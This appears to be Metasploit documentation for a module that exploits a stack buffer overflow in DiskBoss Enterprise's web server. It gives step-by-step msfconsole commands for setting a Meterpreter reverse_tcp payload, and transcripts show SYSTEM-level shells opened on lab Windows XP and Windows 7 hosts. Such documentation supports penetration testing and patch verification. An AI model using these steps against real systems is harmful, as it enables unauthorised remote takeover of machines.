## Vulnerable Application [DiskBoss Enterprise](http://www.diskboss.com) versions up to v7.5.12 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1. The vulnerable application is available for download at [Exploit-DB](https://www.exploit-db.com/apps/71a11b97d2361389b9099e57f6400270-diskbossent_setup_v7.4.28.exe). ## Verification Steps 1. Install a vulnerable DiskBoss Enterprise 2. Start `DiskBoss Enterprise` service 3. Start `DiskBoss Enterprise` client application 4. Navigate to `Tools` > `DiskBoss Server Options` > `Server` 5. Check `Enable Web Server On Port 80` to start the web interface 6. Start `msfconsole` 7. Do `use exploit/windows/http/diskboss_get_bof` 8. Do `set rhost ip` 9. Do `check` 10. Verify the target is vulnerable 11. Do `set payload windows/meterpreter/reverse_tcp` 12. Do `set lhost ip` 13. Do `exploit` 14. Verify the Meterpreter session is opened ## Scenarios ###DiskBoss Enterprise v7.5.12 on Windows XP SP3 ``` msf exploit(diskboss_get_bof) > options Module options (exploit/windows/http/diskboss_get_bof): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.198.130 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.198.138 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(diskboss_get_bof) > exploit [*] Started reverse TCP handler on 192.168.198.138:4444 [*] Automatically detecting the target... [*] Selected Target: DiskBoss Enterprise v7.5.12 [*] Sending stage (957999 bytes) to 192.168.198.130 [*] Meterpreter session 1 opened (192.168.198.138:4444 -> 192.168.198.130:4476) at 2017-01-08 05:12:46 -0500 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : GABOR-03722ADE8 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32 meterpreter > ``` ###DiskBoss Enterprise v7.4.28 on Windows 7 SP1 ``` msf exploit(diskboss_get_bof) > set rhost 192.168.198.133 rhost => 192.168.198.130 msf exploit(diskboss_get_bof) > exploit [*] Started reverse TCP handler on 192.168.198.138:4444 [*] Automatically detecting the target... [*] Selected Target: DiskBoss Enterprise v7.4.28 [*] Sending stage (957999 bytes) to 192.168.198.133 [*] Meterpreter session 2 opened (192.168.198.138:4444 -> 192.168.198.133:49187) at 2017-01-08 05:16:13 -0500 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : WIN-BCJL9PJ5BF5 OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32 meterpreter > ```